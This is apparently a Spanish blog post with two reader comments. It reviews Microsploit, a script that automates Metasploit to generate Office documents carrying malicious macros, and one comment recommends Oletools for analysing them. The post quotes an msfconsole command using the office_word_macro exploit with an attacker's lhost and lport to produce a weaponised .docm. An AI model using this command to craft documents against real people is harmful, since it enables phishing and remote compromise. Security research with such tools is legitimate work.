La verdad es que no se muy bien como calificar a este script pero la verdad es que es una buena herramienta si quieres trastear con documentos Office maliciosos. No se si os pasará a vosotros pero metasploit se me hace un poco pesado a la hora de trabajar con el, sobretodo si no tienes muy claro que exploit en concreto estas buscando por eso Microsploit mola. Gracias al menú podemos seleccionar que tipo de bicho queremos y el script por si solo interectua con metasploit y nos genera el documento con macros en la carpeta output.
Ejemplo de como actúa el script con metasploit:
"$msfconsole -x 'use exploit/multi/fileformat/office_word_macro; set payload $payloads ; set FILENAME $fira.docm; set BODY $bodys; set lhost $yourip ; set lport $yourport; set target 1; exploit; exit -y'"
echo ""
mv ~/.msf4/local/$fira.docm $path/output/$fira.docm
Recomendable, pero siempre sabiendo lo que se está haciendo (aquí se ha hablado mucho sobre word con macros) y se necesitarán unas nociones básicas de metasploit.
Enlace al GitHub:
Sed Buenos ;)
Este comentario ha sido eliminado por el autor.
ResponderEliminarPara analizar este tipo de bichos recomiendo Oletools. He eliminado mi comentario anterior por confundir un script con otro. Sorry señor admin. :). Odio las macros con bicho....
ResponderEliminar